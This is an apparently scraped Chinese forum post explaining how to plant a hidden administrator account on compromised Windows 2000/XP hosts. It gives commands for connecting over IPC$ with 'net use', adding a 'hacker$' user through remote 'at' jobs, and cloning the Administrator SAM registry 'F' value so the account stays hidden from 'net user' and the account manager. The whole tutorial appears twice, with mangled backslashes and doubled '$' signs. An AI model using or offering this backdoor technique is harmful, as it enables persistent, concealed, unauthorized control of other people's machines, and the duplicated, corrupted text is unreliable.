汇总隐藏超级用户的那些方法
2013/1/9 1:57:00 人气 158 怀旧国机论坛超级用户是一个负责管理和维护网
络的用户。这个术语在netware网
上有特殊的含义。超级用户对所有
的文件卷宗、目录和文件有完全的
访问权,它是安装后第一个登录到
服务器上的用户。然后超级用户立
即改变口令,于是没有其它用户能
够访问服务器和获得超级用户无限
的访问权。那么在系统中如何隐藏
超级用户呢?下文中就为大家列举系
统中多种隐藏超级用户方法.
一、如何在命令行下远程建立隐藏
的超级用户
在这里将用at的命令,因为用
at产生的计划任务是以系统身份运
行的,所以也用不到psu.exe程序。
为了能够使用at命令,肉鸡必须开
有schedule的服务,如果没有开
启,可用流光里带的工具
netsvc.exe或sc.exe来远程启动,当
然其方法也可以,只要能启动
schedule服务就行。
对于命令行方式,你可以采用
各种连接方式,如用sql*连接
mssql的1433端口,也可以用
telnet服务,只要以你能得到一个
cmdshell,并且有运行at命令的权
限就可以。
1、首先找到一台肉鸡,至于如
何来找那不是我这里所说的话题。
这里先假设找到一台超级用户为
administrator,密码为12345678的
肉鸡,现在我们开始在命令行下远
程为它建立隐藏的超级用户。(例子
中的主机是我的局域网内的一台主
机,我将它的ip地址改为
13.50.97.238,,请勿在互联网上对
号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令
为:net use 13.50.97.238ipc$$$$
“12345678“ /user:“administrator
3、用at命令在肉鸡上建立一个
用户(如果at服务没有启动,可用小
榕的netsvc.exe或sc.exe来远程启
动):
at 13.50.97.238 12:51 c:
\winntsystem32net.exe user
hacker$$$$ 1234 /add
建立这个加有$$$$符的用户名,
是因为加有$$$$符后,命令行下用net
user将不显示这个用户,但在帐户
管理器却能看到这个用户。
4、同样用at命令导出
hkey_local_machinesamsa
mdomainsaccountusers下键值:
at 13.50.97.238 12:55 c:
\winntregedit.exe /e hacker.reg
hkey_local_
machinesamsa
mdomainsaccountusers
/e 是regedit.exe的参数,在
_local_machinesamsamdom
ainsaccountusers这个键的一定要
以结尾。必要的情况下可以用引号
将“c:\winntregedit.exe /e
hacker.reg hkey_local_
machinesamsa
mdomainsaccountusers”引起
来。
二、如何在图形界面建立隐藏
的超级用户
图形界面下适用本地或开3389
终端服务的肉鸡上。上面我提到的
那位作者说的方法很好,但是较为
复杂,还要用到psu.exe(让程序以
系统用户身份运行的程序),如果在
肉鸡上的话还要上传psu.exe。我说
的这个方法将不用到psu.exe这个程
序。因为windows2000有两个注
册表编辑器:regedit.exe和
regedt32.exe。xp中regedit.exe和
regedt32.exe实为一个程序,修改
键值的权限时在右键中点“权限”来
修改。对regedit.ex
e我想大家都很熟悉,但却不能对注
册表的项键设置权限,而
regedt32.exe最大的优点就是能够
对注册表的项键设置权限。
nt/2000/xp的帐户信息都在注册表
的hkey_local_
machinesamsam键下,但是除
了系统用户system外,其它用户
都无权查看到里面的信息,因此我
首先用regedt32.exe对sam键为我
设置为“完全控制”权限。这样就可
以对sam键内的信息进行读写了
了。具体步聚如下:
1、假设我们是以超级用户
administrator登录到开有终端服务
的肉鸡上的,首先在命令行下或帐
户管理器中建立一个帐户:hacker
$$$$,这里我在命令行下建立这个帐户
net user hacker$$$$ 1234 /add
2、在开始/运行中输入:
regedt32.exe并回车来运行
regedt32.exe。
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加
到安全栏内,这里我是以
administrator的身份登录的,所以
我就将administrator加入,并设置
权限为“完全控制”。这里需要说明
一下:最好是添加你登录的帐户或
帐户所在的组,切莫修改原有的帐
户或组,否则将会带来一系列不必
要的问题。等隐藏超级用户建好
以,再来这里将你添加的帐户删除
即可。
4、再点“开始”→“运行”并输
入“regedit.exe”回车,启动注册表
编辑器regedit.exe。打开键:
hkey_local_
maichinesamsamdomainsacc
ountusernameshacker$$$$“
5、将项hacker$$$$、
00000409、000001f4导出为
hacker.reg、409.reg、1f4.reg,
用记事本分别打这几个导出的文件
进行编辑,将超级用户对应的项
000001f4下的键“f”的值复制,并
覆盖hacker$$$$对应的项00000409
下的键“f”的值,然后再将
00000409.reg与hacker.reg合并。
6、在命令行下执行net user
hacker$$$$ /del将用户hacker$$$$删
除:
net user hacker$$$$ /del
7、在regedit.exe的窗口内按
f5刷新,然后打文件-导入注册表文
件将修改好的hacker.reg导入注册
表即可
8、到此,隐藏的超级用户
hacker$$$$已经建好了,然后关闭
regedit.exe。在regedt32.exe窗口
内把hkey_local_
machinesamsam键权限改回原
来的样子(只要删除添加的帐户
administrator即可)。
9、注意:隐藏的超级用户建好
后,在帐户管理器看不到hacker$$
$$这个用户,在命令行用“net
user”命令也看不到,但是超级用户
建立以后,就不能再改密码了,如
果用net user命令来改hacker$$$$的
密码的话,那么在帐户管理器中将
又会看这个隐藏的超级用户了,而
且不能删除。
超级用户拥有对网络的特殊权
利,但也是有限度的。为此,我们应
该好好本教程中的系统中多种隐藏
超级用户方法,对你以后工作会有帮
助的.
络的用户。这个术语在netware网
上有特殊的含义。超级用户对所有
的文件卷宗、目录和文件有完全的
访问权,它是安装后第一个登录到
服务器上的用户。然后超级用户立
即改变口令,于是没有其它用户能
够访问服务器和获得超级用户无限
的访问权。那么在系统中如何隐藏
超级用户呢?下文中就为大家列举系
统中多种隐藏超级用户方法.
一、如何在命令行下远程建立隐藏
的超级用户
在这里将用at的命令,因为用
at产生的计划任务是以系统身份运
行的,所以也用不到psu.exe程序。
为了能够使用at命令,肉鸡必须开
有schedule的服务,如果没有开
启,可用流光里带的工具
netsvc.exe或sc.exe来远程启动,当
然其方法也可以,只要能启动
schedule服务就行。
对于命令行方式,你可以采用
各种连接方式,如用sql*连接
mssql的1433端口,也可以用
telnet服务,只要以你能得到一个
cmdshell,并且有运行at命令的权
限就可以。
1、首先找到一台肉鸡,至于如
何来找那不是我这里所说的话题。
这里先假设找到一台超级用户为
administrator,密码为12345678的
肉鸡,现在我们开始在命令行下远
程为它建立隐藏的超级用户。(例子
中的主机是我的局域网内的一台主
机,我将它的ip地址改为
13.50.97.238,,请勿在互联网上对
号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令
为:net use 13.50.97.238ipc$$$$
“12345678“ /user:“administrator
3、用at命令在肉鸡上建立一个
用户(如果at服务没有启动,可用小
榕的netsvc.exe或sc.exe来远程启
动):
at 13.50.97.238 12:51 c:
\winntsystem32net.exe user
hacker$$$$ 1234 /add
建立这个加有$$$$符的用户名,
是因为加有$$$$符后,命令行下用net
user将不显示这个用户,但在帐户
管理器却能看到这个用户。
4、同样用at命令导出
hkey_local_machinesamsa
mdomainsaccountusers下键值:
at 13.50.97.238 12:55 c:
\winntregedit.exe /e hacker.reg
hkey_local_
machinesamsa
mdomainsaccountusers
/e 是regedit.exe的参数,在
_local_machinesamsamdom
ainsaccountusers这个键的一定要
以结尾。必要的情况下可以用引号
将“c:\winntregedit.exe /e
hacker.reg hkey_local_
machinesamsa
mdomainsaccountusers”引起
来。
二、如何在图形界面建立隐藏
的超级用户
图形界面下适用本地或开3389
终端服务的肉鸡上。上面我提到的
那位作者说的方法很好,但是较为
复杂,还要用到psu.exe(让程序以
系统用户身份运行的程序),如果在
肉鸡上的话还要上传psu.exe。我说
的这个方法将不用到psu.exe这个程
序。因为windows2000有两个注
册表编辑器:regedit.exe和
regedt32.exe。xp中regedit.exe和
regedt32.exe实为一个程序,修改
键值的权限时在右键中点“权限”来
修改。对regedit.ex
e我想大家都很熟悉,但却不能对注
册表的项键设置权限,而
regedt32.exe最大的优点就是能够
对注册表的项键设置权限。
nt/2000/xp的帐户信息都在注册表
的hkey_local_
machinesamsam键下,但是除
了系统用户system外,其它用户
都无权查看到里面的信息,因此我
首先用regedt32.exe对sam键为我
设置为“完全控制”权限。这样就可
以对sam键内的信息进行读写了
了。具体步聚如下:
1、假设我们是以超级用户
administrator登录到开有终端服务
的肉鸡上的,首先在命令行下或帐
户管理器中建立一个帐户:hacker
$$$$,这里我在命令行下建立这个帐户
net user hacker$$$$ 1234 /add
2、在开始/运行中输入:
regedt32.exe并回车来运行
regedt32.exe。
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加
到安全栏内,这里我是以
administrator的身份登录的,所以
我就将administrator加入,并设置
权限为“完全控制”。这里需要说明
一下:最好是添加你登录的帐户或
帐户所在的组,切莫修改原有的帐
户或组,否则将会带来一系列不必
要的问题。等隐藏超级用户建好
以,再来这里将你添加的帐户删除
即可。
4、再点“开始”→“运行”并输
入“regedit.exe”回车,启动注册表
编辑器regedit.exe。打开键:
hkey_local_
maichinesamsamdomainsacc
ountusernameshacker$$$$“
5、将项hacker$$$$、
00000409、000001f4导出为
hacker.reg、409.reg、1f4.reg,
用记事本分别打这几个导出的文件
进行编辑,将超级用户对应的项
000001f4下的键“f”的值复制,并
覆盖hacker$$$$对应的项00000409
下的键“f”的值,然后再将
00000409.reg与hacker.reg合并。
6、在命令行下执行net user
hacker$$$$ /del将用户hacker$$$$删
除:
net user hacker$$$$ /del
7、在regedit.exe的窗口内按
f5刷新,然后打文件-导入注册表文
件将修改好的hacker.reg导入注册
表即可
8、到此,隐藏的超级用户
hacker$$$$已经建好了,然后关闭
regedit.exe。在regedt32.exe窗口
内把hkey_local_
machinesamsam键权限改回原
来的样子(只要删除添加的帐户
administrator即可)。
9、注意:隐藏的超级用户建好
后,在帐户管理器看不到hacker$$
$$这个用户,在命令行用“net
user”命令也看不到,但是超级用户
建立以后,就不能再改密码了,如
果用net user命令来改hacker$$$$的
密码的话,那么在帐户管理器中将
又会看这个隐藏的超级用户了,而
且不能删除。
超级用户拥有对网络的特殊权
利,但也是有限度的。为此,我们应
该好好本教程中的系统中多种隐藏
超级用户方法,对你以后工作会有帮
助的.
星辰慧星(ID42313)文字续贴01-09 01:58
[iframe=2*2]http://url.cn/FLfTXA[/iframe]
暂无回复!
发表回复